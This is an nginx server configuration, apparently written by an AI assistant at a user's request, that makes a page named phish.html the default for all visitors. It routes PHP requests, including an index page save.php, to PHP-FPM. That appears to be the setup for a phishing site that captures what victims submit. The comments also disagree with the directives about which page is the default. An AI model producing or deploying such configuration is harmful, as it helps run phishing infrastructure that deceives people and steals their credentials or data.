user www-data;
worker_processes 1;
error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
worker_connections 1024;
}

http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
sendfile on;
keepalive_timeout 65;

server {
    listen 80;
    server_name _;
    root /var/www/html;

    # --- FIX ---
    # Set the default page to phish.html, as you requested.
    index save.php;

    location / {
        # This makes sure that visiting "/" loads your default page
        try_files $uri $uri/ /phish.html;
    }

    # --- THIS IS THE CRITICAL BLOCK THAT WAS MISSING ---
    # It tells Nginx to send all .php files to the PHP-FPM process.
    location ~ \.php$ {
        try_files $uri =404;
        
        # This is the address of the PHP-FPM service defined in supervisord.conf
        fastcgi_pass 127.0.0.1:9000; 
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }
}



}




